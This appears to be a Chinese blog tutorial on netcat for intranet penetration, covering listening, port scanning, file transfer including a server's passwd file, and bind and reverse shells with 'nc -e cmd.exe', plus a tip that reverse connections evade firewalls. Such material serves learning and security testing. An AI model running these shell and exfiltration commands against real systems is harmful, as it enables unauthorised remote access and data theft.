内网代理穿透1:nc代理穿透


前言

nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。可以用来反弹shell、传输文件、端口扫描等。写这边博客主要是记录这个工具的用法,以免后面忘记。

一、nc的基本使用

nc可以作为服务端启动一个tcp监听,默认情况下是监听的一个tcp的端口,如:

nc.exe -l -p 9999
客户端测试:

1、服务端建立监听之后,客户端只需要启动nc程序连接对应的IP和端口就可以了,建立侦听后可以进行聊天,如:

nc.exe 192.168.111.100 9999

在这里插入图片描述

2、还可以进行端口扫描,属于TCP扫描,速度还可以。
针对端口扫描可以只扫描特定的端口,也可以扫描一段范围内的端口。

扫描特定端口用法:

ne.exe -vz -w 2 192.168.111.100 80
//-v可视化,-z扫描时不发送数据,-w超时几秒,这里是2秒,最后跟要扫描的端口

在这里插入图片描述

扫描一段端口方法:
nc.exe -vzw 2 192.168.111.100 130-140

在这里插入图片描述

二、nc传文件

方法1:先启动接收命令
这里将服务器上的passwd文件发送到本地:
步骤1:在本地启动监听进行文件接受,格式为:

nc.exe -l -p port > file
nc.exe -l -p 9990 > pass.txt

步骤2:在服务器端将要传输的文件通过9999端口发送数据,格式为:

nc.exe 192.168.1.3 9990 < passwd.txt

在这里插入图片描述

方法2:先启动发送命令
步骤1:在服务器端启动发送命令,将ip.txt文件通过9991端口进行发送,格式如下:

nc.exe -l -p 9991 < ip.txt

步骤2:客户端连接服务端的端口进接收文件,格式如下:

nc.exe  192.168.111.100 9991 > IP.txt

在这里插入图片描述

注意这里传输文件时的箭头变化,当箭头为 ‘>’ 表示接收文。反之,当箭头为 ‘<’ 表示传输文件。同时这里的方法2表示反向连接,这样的好处是,当我们向对方服务器上传文件时,对方服务器的防火墙会拦截,我们就可以通过这种反向连接进行上传,我在本地开发端口,然后对方服务器来主动连接我这个端口,当一连接到我这个端口就可以将文件上传,可以这种方法可以躲避防火墙,因为防火墙不拦截出去的流量。

三 、反弹shell

方法1:remote主机绑定shell
步骤1:在服务器端进行监听:

nc.exe -l -p 9993 -t -e cmd.exe //-t表示通过telnet模式执行cmd.exe程序,可省略

步骤2:在客户端进行主动连接:

nc.exe -nvv 192.168.111.100 9993

在这里插入图片描述

方法2:remote主机绑定shell并反向连接
这个方法是将自己的shell交给服务器,服务器端拿到我的主机权限。
步骤1:在服务器端进行监听,格式为:

nc.exe -lp 9994

步骤2:在客户端将shell反弹到对应服务器的IP和端口中,格式为:

nc.exe -t -e cmd.exe 192.168.111.100  9994

在这里插入图片描述

总结

nc工具主要是针对公网,如果服务器在内网的话需要进行端口转发才行。虽然MSF工具里面有类似功能的工具,但是自己觉得要多掌握几种方法,在实战过程中思路会更多一点,上面有任何不正确的地方,欢迎各位大佬在评论区进行批评指正。

nc工具下载地址

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值